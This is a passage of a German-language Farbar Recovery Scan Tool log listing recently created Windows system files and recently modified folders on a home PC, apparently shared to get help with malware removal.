2017-07-11 20:54 - 2017-06-20 06:40 - 000247808 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AboveLockAppHost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000230912 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edputil.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000038400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TokenBrokerUI.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 002814464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\themeui.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000969728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Unistore.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000646144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mmsys.cpl
2017-07-11 20:54 - 2017-06-20 06:39 - 000471040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VAN.dll
2017-07-11 20:54 - 2017-06-20 06:39 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 001451008 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UIAutomationCore.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001285120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbghelp.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 001171968 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certutil.exe
2017-07-11 20:54 - 2017-06-20 06:38 - 000663040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 06:38 - 000648192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SmartcardCredentialProvider.dll
2017-07-11 20:54 - 2017-06-20 06:37 - 002008576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 06:35 - 002679296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SRH.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 002132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:35 - 000050176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cldapi.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 002750464 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll
2017-07-11 20:54 - 2017-06-20 06:34 - 001492480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:31 - 000334848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PlayToDevice.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000209920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdmaud.drv
2017-07-11 20:54 - 2017-06-20 06:30 - 000157696 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpchttp.dll
2017-07-11 20:54 - 2017-06-20 06:30 - 000089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\olepro32.dll
2017-07-11 20:54 - 2017-06-20 06:28 - 000584192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\apphelp.dll
2017-07-11 20:53 - 2017-07-07 09:27 - 001147288 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 001024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000965024 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.efi
2017-07-11 20:53 - 2017-07-07 09:27 - 000821664 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvloader.exe
2017-07-11 20:53 - 2017-07-07 09:27 - 000750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-07-11 20:53 - 2017-07-07 09:26 - 001065104 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.efi
2017-07-11 20:53 - 2017-07-07 09:25 - 000899824 _____ (Microsoft Corporation) C:\WINDOWS\system32\winresume.exe
2017-07-11 20:53 - 2017-07-07 09:22 - 001186464 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.exe
2017-07-11 20:53 - 2017-07-07 09:17 - 001017760 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecConfig.efi
2017-07-11 20:53 - 2017-07-07 09:14 - 001760264 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecs.dll
2017-07-11 20:53 - 2017-07-07 09:14 - 001171032 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcomp.dll
2017-07-11 20:53 - 2017-07-07 09:13 - 000147800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Clipc.dll
2017-07-11 20:53 - 2017-07-07 09:12 - 000228256 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb20.sys
2017-07-11 20:53 - 2017-07-07 09:10 - 000372128 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll
2017-07-11 20:53 - 2017-07-07 09:09 - 000041376 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininitext.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 001640448 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000859136 _____ (Microsoft Corporation) C:\WINDOWS\system32\uDWM.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000577024 _____ (Microsoft Corporation) C:\WINDOWS\system32\duser.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-07-11 20:53 - 2017-07-07 08:27 - 000360960 _____ (Microsoft Corporation) C:\WINDOWS\system32\ConhostV2.dll
2017-07-11 20:53 - 2017-07-07 08:23 - 000029696 _____ (Microsoft Corporation) C:\WINDOWS\system32\eapprovp.dll
2017-07-11 20:53 - 2017-07-07 08:22 - 000520704 _____ (Microsoft Corporation) C:\WINDOWS\system32\daxexec.dll
2017-07-11 20:53 - 2017-07-07 08:21 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncCsp.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000256000 _____ (Microsoft Corporation) C:\WINDOWS\system32\domgmt.dll
2017-07-11 20:53 - 2017-07-07 08:19 - 000137216 _____ (Microsoft Corporation) C:\WINDOWS\system32\raschap.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000563712 _____ (Microsoft Corporation) C:\WINDOWS\system32\DevicePairing.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000353280 _____ (Microsoft Corporation) C:\WINDOWS\system32\Wldap32.dll
2017-07-11 20:53 - 2017-07-07 08:18 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsExt.dll
2017-07-11 20:53 - 2017-07-07 08:15 - 000922112 _____ (Microsoft Corporation) C:\WINDOWS\system32\kerberos.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 005892096 _____ (Microsoft Corporation) C:\WINDOWS\system32\d2d1.dll
2017-07-11 20:53 - 2017-07-07 08:13 - 000840192 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 003307008 _____ (Microsoft Corporation) C:\WINDOWS\system32\wininet.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 002499584 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.pcshell.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001713664 _____ (Microsoft Corporation) C:\WINDOWS\system32\ActiveSyncProvider.dll
2017-07-11 20:53 - 2017-07-07 08:12 - 001420800 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.Maps.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 003139584 _____ (Microsoft Corporation) C:\WINDOWS\system32\msftedit.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002829824 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002649600 _____ (Microsoft Corporation) C:\WINDOWS\system32\dwmcore.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 002177024 _____ (Microsoft Corporation) C:\WINDOWS\system32\OpcServices.dll
2017-07-11 20:53 - 2017-07-07 08:11 - 001888256 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000430080 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToDevice.dll
2017-07-11 20:53 - 2017-07-07 08:07 - 000391168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMPhoto.dll
2017-07-11 20:53 - 2017-07-07 08:05 - 000370176 _____ (Microsoft Corporation) C:\WINDOWS\system32\msinfo32.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001703424 _____ (Microsoft Corporation) C:\WINDOWS\system32\aitstatic.exe
2017-07-11 20:53 - 2017-07-07 08:04 - 001403392 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdc.dll
2017-07-11 20:53 - 2017-07-07 08:04 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\system32\csrsrv.dll
2017-07-11 20:53 - 2017-07-02 00:52 - 000031932 _____ C:\WINDOWS\system32\edgehtmlpluginpolicy.bin
2017-07-11 20:53 - 2017-06-20 08:18 - 001564576 _____ (Microsoft Corporation) C:\WINDOWS\system32\appraiser.dll
2017-07-11 20:53 - 2017-06-20 08:18 - 000096672 _____ (Microsoft Corporation) C:\WINDOWS\system32\CompatTelRunner.exe
2017-07-11 20:53 - 2017-06-20 08:17 - 000629152 _____ (Microsoft Corporation) C:\WINDOWS\system32\generaltel.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000544160 _____ (Microsoft Corporation) C:\WINDOWS\system32\devinv.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000334240 _____ (Microsoft Corporation) C:\WINDOWS\system32\invagent.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000136096 _____ (Microsoft Corporation) C:\WINDOWS\system32\acmigration.dll
2017-07-11 20:53 - 2017-06-20 08:17 - 000034720 _____ (Microsoft Corporation) C:\WINDOWS\system32\DeviceCensus.exe
2017-07-11 20:53 - 2017-06-20 08:16 - 001214880 _____ (Microsoft Corporation) C:\WINDOWS\system32\aeinv.dll
2017-07-11 20:53 - 2017-06-20 08:16 - 000335776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dcntel.dll
2017-07-11 20:53 - 2017-06-20 08:15 - 000233376 _____ (Microsoft Corporation) C:\WINDOWS\system32\aepic.dll
2017-07-11 20:53 - 2017-06-20 08:11 - 001395152 _____ (Microsoft Corporation) C:\WINDOWS\system32\winload.efi
2017-07-11 20:53 - 2017-06-20 08:10 - 001930320 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntdll.dll
2017-07-11 20:53 - 2017-06-20 08:05 - 001057832 _____ (Microsoft Corporation) C:\WINDOWS\system32\MrmCoreR.dll
2017-07-11 20:53 - 2017-06-20 08:04 - 004847424 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2017-07-11 20:53 - 2017-06-20 08:03 - 000179608 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostUser.dll
2017-07-11 20:53 - 2017-06-20 08:03 - 000102312 _____ (Microsoft Corporation) C:\WINDOWS\system32\CredentialUIBroker.exe
2017-07-11 20:53 - 2017-06-20 08:02 - 000426912 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostCommon.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000558920 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.ApplicationModel.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000255904 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxAllUserStore.dll
2017-07-11 20:53 - 2017-06-20 08:00 - 000142752 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wcifs.sys
2017-07-11 20:53 - 2017-06-20 07:59 - 000583304 _____ (Microsoft Corporation) C:\WINDOWS\system32\audiodg.exe
2017-07-11 20:53 - 2017-06-20 07:58 - 000833160 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeManagerObj.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000406072 _____ (Microsoft Corporation) C:\WINDOWS\system32\MMDevAPI.dll
2017-07-11 20:53 - 2017-06-20 07:58 - 000203168 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHostBroker.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000970752 _____ (Microsoft Corporation) C:\WINDOWS\system32\msctfuimanager.dll
2017-07-11 20:53 - 2017-06-20 07:16 - 000417280 _____ (Microsoft Corporation) C:\WINDOWS\system32\oleacc.dll
2017-07-11 20:53 - 2017-06-20 07:15 - 001620368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ntdll.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 001150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-07-11 20:53 - 2017-06-20 07:14 - 000032768 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mskssrv.sys
2017-07-11 20:53 - 2017-06-20 07:13 - 000216064 _____ (Microsoft Corporation) C:\WINDOWS\system32\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000081408 _____ (Microsoft Corporation) C:\WINDOWS\system32\wwanprotdim.dll
2017-07-11 20:53 - 2017-06-20 07:13 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgr.dll
2017-07-11 20:53 - 2017-06-20 07:12 - 000144384 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:53 - 2017-06-20 07:11 - 000200192 _____ (Microsoft Corporation) C:\WINDOWS\system32\ScDeviceEnum.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000315392 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsEnvironment.Desktop.dll
2017-07-11 20:53 - 2017-06-20 07:10 - 000188928 _____ (Microsoft Corporation) C:\WINDOWS\system32\wincredui.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000555008 _____ (Microsoft Corporation) C:\WINDOWS\system32\WFDSConMgrSvc.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000427008 _____ (Microsoft Corporation) C:\WINDOWS\system32\provengine.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000250368 _____ (Microsoft Corporation) C:\WINDOWS\system32\SCardSvr.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000205312 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipboardServer.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000189952 _____ (Microsoft Corporation) C:\WINDOWS\system32\certprop.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000135680 _____ (Microsoft Corporation) C:\WINDOWS\system32\sendmail.dll
2017-07-11 20:53 - 2017-06-20 07:09 - 000062464 _____ (Microsoft Corporation) C:\WINDOWS\system32\dataclen.dll
2017-07-11 20:53 - 2017-06-20 07:08 - 000791040 _____ (Microsoft Corporation) C:\WINDOWS\system32\certca.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000916992 _____ (Microsoft Corporation) C:\WINDOWS\system32\bcastdvr.exe
2017-07-11 20:53 - 2017-06-20 07:07 - 000757248 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\WdiWiFi.sys
2017-07-11 20:53 - 2017-06-20 07:07 - 000626176 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Internal.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000621056 _____ (Microsoft Corporation) C:\WINDOWS\system32\SndVolSSO.dll
2017-07-11 20:53 - 2017-06-20 07:07 - 000411136 _____ (Microsoft Corporation) C:\WINDOWS\system32\updatehandlers.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000455680 _____ (Microsoft Corporation) C:\WINDOWS\system32\certcli.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000335872 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinDataModelServer.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000299520 _____ (Microsoft Corporation) C:\WINDOWS\system32\AboveLockAppHost.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000253440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edputil.dll
2017-07-11 20:53 - 2017-06-20 07:06 - 000045056 _____ (Microsoft Corporation) C:\WINDOWS\system32\TokenBrokerUI.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 002873344 _____ (Microsoft Corporation) C:\WINDOWS\system32\themeui.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000873472 _____ (Microsoft Corporation) C:\WINDOWS\system32\rasmans.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000696320 _____ (Microsoft Corporation) C:\WINDOWS\system32\mmsys.cpl
2017-07-11 20:53 - 2017-06-20 07:05 - 000406528 _____ (Microsoft Corporation) C:\WINDOWS\system32\InputSwitch.dll
2017-07-11 20:53 - 2017-06-20 07:05 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\cldapi.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001818624 _____ (Microsoft Corporation) C:\WINDOWS\system32\UIAutomationCore.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 001425920 _____ (Microsoft Corporation) C:\WINDOWS\system32\certutil.exe
2017-07-11 20:53 - 2017-06-20 07:04 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\system32\SmartcardCredentialProvider.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000802816 _____ (Microsoft Corporation) C:\WINDOWS\system32\wcmsvc.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000400896 _____ (Microsoft Corporation) C:\WINDOWS\system32\RDXTaskFactory.dll
2017-07-11 20:53 - 2017-06-20 07:04 - 000178176 _____ (Microsoft Corporation) C:\WINDOWS\system32\EditionUpgradeHelper.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000681984 _____ (Microsoft Corporation) C:\WINDOWS\system32\usocore.dll
2017-07-11 20:53 - 2017-06-20 07:02 - 000081920 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudDomainJoinAUG.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003803136 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsThresholdAdminFlowUI.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003332096 _____ (Microsoft Corporation) C:\WINDOWS\system32\SRH.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 003059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\NetworkMobileSettings.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 001076736 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.appcore.dll
2017-07-11 20:53 - 2017-06-20 07:01 - 000397312 _____ (Microsoft Corporation) C:\WINDOWS\system32\rascustom.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 003057664 _____ (Microsoft Corporation) C:\WINDOWS\system32\CertEnroll.dll
2017-07-11 20:53 - 2017-06-20 07:00 - 002171392 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Devices.Bluetooth.dll
2017-07-11 20:53 - 2017-06-20 06:57 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\system32\omadmclient.exe
2017-07-11 20:53 - 2017-06-20 06:57 - 000138752 _____ (Microsoft Corporation) C:\WINDOWS\system32\DMPushRouterCore.dll
2017-07-11 20:53 - 2017-06-20 06:56 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\system32\wdmaud.drv

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-08-09 18:59 - 2017-03-23 02:42 - 000000000 ____D C:\FRST
2017-08-09 18:57 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA
2017-08-09 18:56 - 2015-03-01 21:28 - 000000000 ____D C:\Users\***\AppData\Roaming\Skype
2017-08-09 18:55 - 2017-03-18 23:01 - 000000000 ____D C:\WINDOWS\INF
2017-08-09 18:55 - 2015-11-03 03:16 - 000000000 ____D C:\AdwCleaner
2017-08-09 18:54 - 2016-07-13 19:39 - 000000000 ____D C:\Users\***\AppData\Local\Spotify
2017-08-09 18:53 - 2016-07-13 19:39 - 000000000 ____D C:\Users\***\AppData\Roaming\Spotify
2017-08-09 18:47 - 2017-04-19 20:20 - 004124406 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-08-09 18:47 - 2017-03-20 06:35 - 002023472 _____ C:\WINDOWS\system32\perfh007.dat
2017-08-09 18:47 - 2017-03-20 06:35 - 000514080 _____ C:\WINDOWS\system32\perfc007.dat
2017-08-09 18:46 - 2017-03-18 23:03 - 000000000 ___HD C:\Program Files\WindowsApps
2017-08-09 18:46 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\AppReadiness
2017-08-09 18:46 - 2015-02-06 18:49 - 000000000 ____D C:\Users\***\AppData\Local\Packages
2017-08-09 18:40 - 2017-04-19 20:15 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-08-09 18:40 - 2017-04-19 20:10 - 000000000 ____D C:\Users\***
2017-08-09 18:40 - 2017-04-19 20:09 - 000248024 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-08-08 23:15 - 2017-04-19 20:09 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2017-08-08 23:04 - 2015-02-07 15:26 - 000000000 ____D C:\Users\***\AppData\Roaming\Dropbox
2017-08-08 20:32 - 2015-04-10 22:33 - 000000000 ____D C:\Users\***\AppData\Roaming\TS3Client
2017-08-08 19:54 - 2015-02-06 18:47 - 000000000 __RHD C:\Users\Public\AccountPictures
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\SysWOW64\WinMetadata
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\WinMetadata
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\system32\oobe
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\ShellExperiences
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files\Windows Photo Viewer
2017-08-08 19:53 - 2017-03-18 23:03 - 000000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-08-08 19:53 - 2017-03-18 13:40 - 001048576 _____ C:\WINDOWS\system32\config\BBI
2017-08-08 19:28 - 2017-05-09 20:16 - 000000000 ____D C:\WINDOWS\CbsTemp
2017-08-08 19:28 - 2015-02-06 20:57 - 000000000 ____D C:\WINDOWS\system32\MRT
2017-08-08 19:26 - 2015-02-06 20:57 - 140394280 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-08-08 17:25 - 2017-04-19 20:15 - 000004182 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{87C32643-1831-40C5-90AB-019E81221598}
2017-08-07 23:51 - 2017-03-11 14:12 - 000000000 ____D C:\ProgramData\IObit
2017-08-07 23:51 - 2015-03-15 23:24 - 000000000 ____D C:\Users\***\AppData\Roaming\IObit
2017-08-07 23:51 - 2015-03-15 23:24 - 000000000 ____D C:\Users\***\AppData\LocalLow\IObit
2017-08-07 23:31 - 2015-03-09 00:28 - 000000000 ____D C:\Users\***\AppData\Local\Ubisoft Game Launcher
2017-08-07 19:35 - 2017-05-17 19:05 - 000000000 ____D C:\Users\***\AppData\Local\b95cd
2017-08-07 19:15 - 2017-05-02 14:50 - 000000988 _____ C:\Users\Public\Desktop\TomTom MyDrive Connect.lnk
2017-08-07 03:30 - 2016-01-03 14:51 - 000000000 ____D C:\Users\***\AppData\Local\CrashDumps
2017-08-06 16:31 - 2017-04-18 18:59 - 000001457 _____ C:\Users\***\Desktop\KCD.lnk
2017-08-06 13:21 - 2015-02-06 20:34 - 000000000 ____D C:\Users\***\Documents\The Lord of the Rings Online
2017-08-06 12:40 - 2015-02-06 20:39 - 000000000 ____D C:\Users\***\AppData\Local\Turbine
2017-08-06 01:00 - 2015-04-04 15:53 - 000000000 ____D C:\Program Files\GIMP 2
2017-08-06 00:35 - 2015-03-15 23:53 - 000000000 ____D C:\Program Files (x86)\Java
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Oracle
2017-08-06 00:28 - 2015-02-06 19:17 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-08-06 00:26 - 2017-05-02 17:37 - 000002170 _____ C:\Users\Public\Desktop\Smart Switch.lnk
2017-08-06 00:25 - 2017-04-06 21:53 - 000000000 ____D C:\Users\***\AppData\Roaming\MyPhoneExplorer
2017-08-06 00:20 - 2015-03-15 23:24 - 000000000 ____D C:\Program Files (x86)\IObit
2017-08-06 00:12 - 2015-02-06 19:58 - 000000000 ____D C:\Users\***\AppData\Local\Battle.net
2017-08-05 23:25 - 2015-02-06 20:19 - 000000000 ____D C:\ProgramData\Package Cache
2017-08-05 23:20 - 2015-05-19 11:35 - 000000000 ____D C:\GOG Games
2017-08-05 23:04 - 2017-03-18 13:40 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2017-08-05 23:04 - 2015-02-06 19:51 - 000565416 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2017-08-05 23:00 - 2016-06-12 12:19 - 000000000 ____D C:\Program Files (x86)\Adobe
2017-08-03 20:00 - 2017-05-09 19:18 - 000000626 _____ C:\Users\Martin
2017-08-01 14:04 - 2015-06-16 18:56 - 000000000 ____D C:\Users\***\AppData\Local\Dropbox
2017-08-01 14:04 - 2015-02-07 15:28 - 000000000 ___RD C:\Users\***\Dropbox
2017-08-01 03:15 - 2017-03-18 23:03 - 000000000 ____D C:\WINDOWS\rescache
2017-08-01 02:04 - 2015-12-12 16:08 - 000000000 ____D C:\Users\***\AppData\Roaming\Mozilla
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Users\***\AppData\Local\Google
2017-08-01 01:54 - 2015-02-06 18:54 - 000000000 ____D C:\Program Files (x86)\Google
2017-07-31 20:56 - 2015-02-06 19:26 - 000000000 ____D C:\Users\***\AppData\Roaming\Origin
2017-07-31 20:56 - 2015-02-06 19:25 - 000000000 ____D C:\ProgramData\Origin
2017-07-31 20:21 - 2016-11-04 22:04 - 000000000 ____D C:\Users\***\Documents\Darkest
2017-07-31 20:21 - 2015-05-19 13:16 - 000000000 ____D C:\Users\***\Documents\The Witcher 3
2017-07-31 20:17 - 2015-05-19 12:54 - 000000000 ____D C:\Program Files (x86)\GalaxyClient
2017-07-31 20:02 - 2016-05-04 20:53 - 000000000 ____D C:\ProgramData\Logitech
2017-07-31 20:02 - 2016-05-04 17:52 - 000000000 ____D C:\ProgramData\Squeezebox
2017-07-31 20:02 - 2016-05-02 22:30 - 000000000 ____D C:\Program Files (x86)\Logitech
2017-07-28 19:41 - 2017-04-19 20:10 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2017-07-28 19:41 - 2016-03-11 21:30 - 000000000 ____D C:\Program Files (x86)\VulkanRT
2017-07-28 19:41 - 2015-02-03 17:22 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2017-07-28 18:14 - 2017-04-19 20:10 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-07-28 18:14 - 2016-09-29 12:59 - 000001481 _____ C:\Users\Public\Desktop\GeForce Experience.lnk
2017-07-28 18:06 - 2015-04-28 22:14 - 000000865 _____ C:\Users\Public\Desktop\CCleaner.lnk
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\***\AppData\Roaming\discord
2017-07-26 23:16 - 2017-03-06 22:52 - 000000000 ____D C:\Users\***\AppData\Local\Discord
2017-07-26 19:09 - 2016-09-29 12:59 - 001755072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspbridge64.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 001317312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspbridge.dll
2017-07-26 19:09 - 2016-09-29 12:59 - 000121280 _____ C:\WINDOWS\system32\NvRtmpStreamer64.dll
2017-07-26 15:40 - 2017-04-06 19:59 - 000001951 _____ C:\WINDOWS\NvTelemetryContainerRecovery.bat
2017-07-19 01:24 - 2017-05-06 18:18 - 000069752 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvshext.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 006463608 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcpl.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 002479040 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvc64.dll
2017-07-19 01:24 - 2017-04-19 20:10 - 001762936 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvsvcr.dll
